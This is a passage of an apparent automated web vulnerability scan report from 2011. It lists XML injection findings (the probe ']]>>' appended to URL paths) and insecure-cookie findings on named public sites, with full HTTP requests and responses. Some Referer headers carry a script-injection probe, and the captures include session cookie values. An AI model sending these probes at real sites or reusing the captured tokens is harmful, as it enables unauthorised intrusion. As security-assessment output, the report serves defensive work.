The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/images/blank.gif]]>> HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 43376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
search").style.border="0px";

    document.getElementById("livesearch").style.padding="0px";

return;

}

xmlhttp=GetXmlHttpObject()

if (xmlhttp==null)

{

alert ("Your browser does not support XML HTTP Request");

return;

}

document.getElementById("livesearch").style.padding="0px";

type=document.searchform.type.value;

var url="http://kroogy.com/index/livesearch";

url=url+"&q="+str;

ur
...[SNIP]...

10.121. http://seal.controlcase.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://seal.controlcase.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:10:40 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1182

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.122. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://seal.controlcase.com
Path:   /include/image/back_en.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /include]]>>/image/back_en.gif HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=issueForm&clientid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000068)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.10.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:15:06 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1182

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.123. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://seal.controlcase.com
Path:   /include/image/back_en.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /include/image]]>>/back_en.gif HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=issueForm&clientid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000068)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.10.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:15:14 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1182

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.124. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://seal.controlcase.com
Path:   /include/image/back_en.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /include/image/back_en.gif]]>> HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=issueForm&clientid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000068)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.10.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:15:21 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1182

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.125. http://seal.controlcase.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /index.php]]>>?page=showCert&cId=3063048179 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:13:46 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1182

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.126. http://www.dictof.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:28 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<a href="/sitemap.xml">XML Site Map</a>
...[SNIP]...

10.127. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.infusionblog.com
Path:   /wp-content/themes/hybrid/library/js/drop-downs.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /wp-content]]>>/themes/hybrid/library/js/drop-downs.js?ver=1.4 HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 404 Not found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:41:27 GMT
X-Pingback: http://www.infusionblog.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Last-Modified: Mon, 25 Apr 2011 01:41:27 GMT
Content-Length: 18743

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

10.128. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.infusionblog.com
Path:   /wp-content/themes/hybrid/library/js/drop-downs.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /wp-content/themes]]>>/hybrid/library/js/drop-downs.js?ver=1.4 HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 404 Not found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:43:17 GMT
X-Pingback: http://www.infusionblog.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Last-Modified: Mon, 25 Apr 2011 01:43:17 GMT
Content-Length: 18743

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

10.129. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.infusionblog.com
Path:   /wp-content/themes/hybrid/library/js/drop-downs.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /wp-content/themes/hybrid]]>>/library/js/drop-downs.js?ver=1.4 HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 404 Not found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:45:43 GMT
X-Pingback: http://www.infusionblog.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Last-Modified: Mon, 25 Apr 2011 01:45:43 GMT
Content-Length: 18743

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

11. SSL cookie without secure flag set  previous  next
There are 110 instances of this issue:


11.1. https://login.silverlight.net/login/createuser.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ocpzfo45cjdd3er2s2e2k155; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:14 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:14 GMT
Content-Length: 9052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

11.2. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iwguskeht5pp3amyv0gl5fuz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:17 GMT
Content-Length: 13113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...

11.3. https://netserv.fpoint.com/redir/redirect.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://netserv.fpoint.com
Path:   /redir/redirect.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redir/redirect.asp?rdtl=985 HTTP/1.1
Host: netserv.fpoint.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 16:56:47 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://www.gcpowertools.com/products/SpreadforASPNET
Content-Length: 173
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCRATADB=IFFBGJCCGOADNKFFABKOHIED; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.gcpowertools.com/products/SpreadforASPNET">here</a>.</body>

11.4. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

11.5. https://protect724.arcsight.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://protect724.arcsight.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; __utmb=226624333

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 20:19:02 GMT
Server: Apache-Coyote/1.1
X-JAL: 1
Location: https://protect724.arcsight.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=2219 t=1303676342121021
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_97_SM11-7001=1108904202.22811.0000; path=/
Content-Length: 0


11.6. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
